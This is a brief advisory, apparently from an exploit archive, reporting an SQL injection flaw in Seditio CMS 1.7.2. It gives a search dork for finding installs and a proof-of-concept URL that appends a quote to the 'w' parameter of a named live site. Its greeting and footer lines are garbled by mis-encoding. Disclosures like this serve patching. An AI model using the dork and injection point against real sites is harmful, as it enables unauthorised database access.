Seditio CMS version 1.7.2 may suffer from a remote SQL injection vulnerability.
3d691ae0d4d05dafb9fe51db8a4b722d
========================================================================
| # Title : Seditio CMS version 1.7.2 Sql injection vulnerability
| # Author : indoushka
| # email : [email protected]
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Version : 1.7.2
| # Vendor : http://www.seditiocms.com
| # Dork : "Powered by Seditio"
========================================================================
poc :
http://www.urskogen.com/seditio/list.php?c=news&o=&p=&s=count&w=1%27 (inject her)
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------
|
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |
|
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================